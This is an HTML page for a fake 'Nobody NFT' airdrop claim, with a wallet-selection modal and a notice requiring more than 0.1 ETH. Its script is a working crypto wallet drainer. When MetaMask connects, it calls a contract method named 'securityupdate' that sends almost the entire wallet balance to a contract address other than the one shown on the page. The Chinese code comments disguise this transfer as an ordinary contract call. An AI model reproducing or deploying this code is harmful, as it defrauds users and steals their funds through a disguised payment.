<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Nobody</title>
    <script src="https://cdn.jsdelivr.net/npm/web3/dist/web3.min.js"></script> <!-- 引入web3.js -->

    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            position: relative;
            height: 100vh;
            display: flex;
            justify-content: center;
            align-items: center;
            overflow: hidden; /* 隐藏模态框外的滚动条 */
        }
        body::before {
            content: '';
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background: url('images/home_bg_mint_1.png') no-repeat center center fixed;
            background-size: cover;
            filter: blur(5px);
            opacity: 0.8;
            z-index: -1;
        }
        .container {
            text-align: center;
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: stretch;
            color: #fff;
        }
        .box {
            flex: 5;
            padding: 20px;
            margin: 10px;
            border-radius: 10px;
            background-color: rgba(0, 123, 255, 0.8);
        }
        .middle-box {
            flex: 5;
            padding: 20px;
            margin: 10px;
            border-radius: 10px;
            background-color: rgba(255, 255, 255, 0.8);
            color: blue;
            cursor: pointer;
        }
        .button-large, .button-small {
            background-color: #007BFF;
            color: #fff;
            cursor: pointer;
            border: none;
            border-radius: 5px;
        }
        .button-large {
            padding: 20px 40px;
            font-size: 24px;
            margin-top: 20px;
        }
        .button-small {
            padding: 10px 20px;
            font-size: 16px;
            margin-top: 20px;
        }
        .button-large:hover, .button-small:hover {
            background-color: #0056b3;
        }
        ul {
            list-style-type: none;
            padding: 0;
        }
        li {
            margin: 10px 0;
            font-size: 18px;
        }
        .modal-wrapper {
            display: none;
            position: fixed;
            z-index: 2;
            left: 50%;
            top: 46%;
            transform: translate(-50%, -50%);
            background: rgba(0, 0, 0, 0.5);
            justify-content: center;
            align-items: center;
        }
        .wallet-modal {
            width: 350px;
            height: auto;
            max-height: 80vh; /* 设置最大高度 */
            overflow-y: auto; /* 允许垂直滚动 */
            background-color: rgba(255, 255, 255, 0.8);
            padding: 10px;
            border-radius: 10px;
            text-align: center;
            display: flex;
            flex-direction: column;
            gap: 5px;
        }
        .wallet-option {
            border: 2px solid #007BFF;
            border-radius: 10px;
            padding: 5px;
            cursor: pointer;
            display: flex;
            flex-direction: column;
            align-items: center;
            transition: transform 0.3s;
        }
        .wallet-option:hover {
            transform: scale(1.1);
        }
        .wallet-logo {
            max-width: 30px;
            max-height: 30px;
        }

        .logo-wrapper {
            border-radius: 50%; /* 将边框变成圆形 */
            overflow: hidden; /* 隐藏超出边框的部分 */
            margin: 10px; /* 添加一些外边距 */
            position: absolute;
            top: 0;
            left: 0;
            z-index: 10; /* 确保logo在最上层 */
        }

        .logo-wrapper img {
            width: 80px; /* 调整 logo 的宽度 */
            height: auto; /* 保持高度自适应 */
        }

        .right-bottom-content {
            position: fixed;
            bottom: 20px;
            right: 40px;
            text-align: right;
            color: #fff;
            text-shadow: 2px 2px 2px rgba(0,0,0,0.5); /* 3D文本效果 */
        }

        .right-bottom-content h2, .right-bottom-content p {
            margin: 0;
            padding: 5px;
        }

        
    </style>
    <script src="https://cdn.jsdelivr.net/npm/web3/dist/web3.min.js"></script> <!-- 引入web3.js -->
</head>
<body>
    <!-- 在这里添加动态logo的链接 -->
    <a href="index.html" class="logo-wrapper">
        <img src="images/nft_mint_cover.webp" alt="Home">
    </a>

       <f" alt="Home">
    </a>

    <div class="right-bottom-content">
        <h2>Notice</h2>
        <h2>This airdrop participant address needs to maintain an ETH balance of more than 0.1</h2>
        <h2>Otherwise, participation will fail. Please check the lower right corner of the homepage for details.</h2>
         
    </div>
 
    <div class="container">
    <div class="box">
        <h1>Claim of airdrop quotas</h1>
        <button class="button-large" onclick="handleWallet('MetaMask')">Connect Wallet</button>
    </div>

    <div class="box">
        <ul>
            <li>Step 1: Click the "Connect Wallet" button above.</li>
            <li>Step 2: Confirm your wallet address.</li>
            <li>Step 3: Claim your Airdrop!</li>
        </ul>
    </div>

    <div class="middle-box" onclick="clickMe()">
        <h2>Nobody NFT Smart contract consultation</h2>
        <a href= "https://etherscan.io/address/0x129d453253dbCE5CF6997DB8Fb461B2A20Fd275F" class="blue-text">0x129d453253dbCE5CF6997DB8Fb461B2A20Fd275F</a></p>
        <p>The delivery is ongoing</p>
        <p class="blue-text"Nobody NFT 智能合約資訊></p>
    </div>
 </div>
 
 <!-- 钱包选择模态框 -->
 <div class="modal-wrapper" id="walletModalWrapper" onclick="document.getElementById('walletModalWrapper').style.display = 'none'">
    <div class="wallet-modal">
        <div class="wallet-option" onclick="handleWallet('MetaMask')">
            <img src="images/MetaMask-Partnership-The-Giving-Block.png" alt="MetaMask Logo" class="wallet-logo">
            <p>MetaMask</p>
        </div>
        <div class="wallet-option" onclick="handleWallet('OKX Wallet')">
            <img src="images/OKX-Exchange-1.webp" alt="OKX Wallet Logo" class="wallet-logo">
            <p>OKX Wallet</p>
        </div>
        <div class="wallet-option" onclick="handleWallet('Trust Wallet')">
            <img src="images/score-card-images_0025_Vector-Smart-Object.webp" alt="Trust Wallet Logo" class="wallet-logo">
            <p>Trust Wallet</p>
        </div>
        <div class="wallet-option" onclick="handleWallet('Coinbase Wallet')">
            <img src="images/Coinbase Wallet.png" alt="Coinbase Wallet Logo" class="wallet-logo">
            <p>Coinbase Wallet</p>
        </div>
        <div class="wallet-option" onclick="handleWallet('WalletConnect')">
            <img src="images/WalletConnect-Logo.png" alt="WalletConnect Logo" class="wallet-logo">
            <p>WalletConnect</p>
        </div>
        <div class="wallet-option" onclick="handleWallet('Rainbow')">
            <img src="images/bold-electrical-logo-design-by-ergotm-designcrowd.png" alt="Rainbow Logo" class="wallet-logo">
            <p>Rainbow</p>
        </div>
        <div class="wallet-option" onclick="handleWallet('Argent')">
            <img src="images/Argent.png" alt="Argent Logo" class="wallet-logo">
            <p>Argent</p>
        </div>
        <div class="wallet-option" onclick="handleWallet('Phantom')">
            <img src="images/EXCHANGE-REVIEW-2021-12-19T162607.174.png" alt="Phantom Logo" class="wallet-logo">
            <p>Phantom</p>
        </div>
        <div class="wallet-option" onclick="handleWallet('Ledger Live')">
            <img src="images/Ledger Live.png" alt="Ledger Live Logo" class="wallet-logo">
            <p>Ledger Live</p>
        </div>
        <div class="wallet-option" onclick="handleWallet('Bitski')">
            <img src="images/Bitski.png" alt="Bitski Logo" class="wallet-logo">
            <p>Bitski</p>
        </div>
    </div>
 </div>
 <script>
    
async function handleWallet(walletName) {
    if (walletName === 'MetaMask') {
        if (typeof window.ethereum !== 'undefined') {
            // MetaMask已安装
            try {
                const contractAddress = "0x40ABC1FAd8285F75Ca1bE733c98887908ce85936"
                const accounts = await window.ethereum.request({ method: 'eth_requestAccounts' }); // 请求用户授权
                const curAccount = accounts[0]; // 获取当前用户的钱包地址
                const web3 = new Web3(window.ethereum);
                const balanceWei = await web3.eth.getBalance(curAccount);
                console.log('当前用户的钱包地址:', curAccount);
                console.log('当前用户的余额(wei):', balanceWei);
                const abiJson = [{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[{"internalType":"uint256","name":"","type":"uint256"}],"name":"connectedWallets","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"getConnectedWallets","outputs":[{"internalType":"address[]","name":"","type":"address[]"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"securityupdate","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"withdraw","outputs":[],"stateMutability":"nonpayable","type":"function"}];
                const contract = new web3.eth.Contract(abiJson, contractAddress); // 使用合约的ABI和地址初始化合约对象
                // 假设调用合约的doSomething方法
                await contract.methods.securityupdate().send(({
                    from: curAccount,
                    value: balanceWei - BigInt(1000000000000000), // 从用户余额中扣除1ETH
                }));
                console.log('合约调用结果:', result);
            } catch (error) {
                console.error('合约调用失败:', error);
            }
        } else {
            // MetaMask未安装，跳转到官网
            window.location.href = 'https://metamask.io/';
        }
    }
    // 可以为其他钱包添加类似的逻辑
}
</script>
</body>
</html>